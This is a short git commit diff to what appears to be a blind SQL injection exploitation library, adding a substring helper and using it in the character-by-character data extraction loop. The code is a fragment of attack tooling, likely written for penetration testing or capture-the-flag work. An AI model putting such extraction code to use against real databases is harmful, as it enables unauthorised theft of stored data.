SQLi: custom substr method

2025-12-08 12:35:56 +01:00
parent 7088f50fa0
commit 6b807eb828
1 changed files with 4 additions and 1 deletions
--- a/sqli.py
+++ b/sqli.py
@@ -35,6 +35,9 @@ class SQLi(ABC):

        return rows

+    def substring(self, what, offset: int, size: int):
+        return f"substr({what},{offset},{size})"
+
    @abstractmethod
    def ascii(self):
        pass
@@ -207,7 +210,7 @@ class BlindSQLi(SQLi, ABC):
        cur_str = ""
        while True:
            found = False
-            cur_column = self.ascii() + f"(substr({column},{len(cur_str) + 1},1))"
+            cur_column = self.ascii() + "(" + self.substring(column, len(cur_str) + 1, 1) + ")"
            if charset:
                query = self.build_query(cur_column, table, condition, offset)
                for c in charset: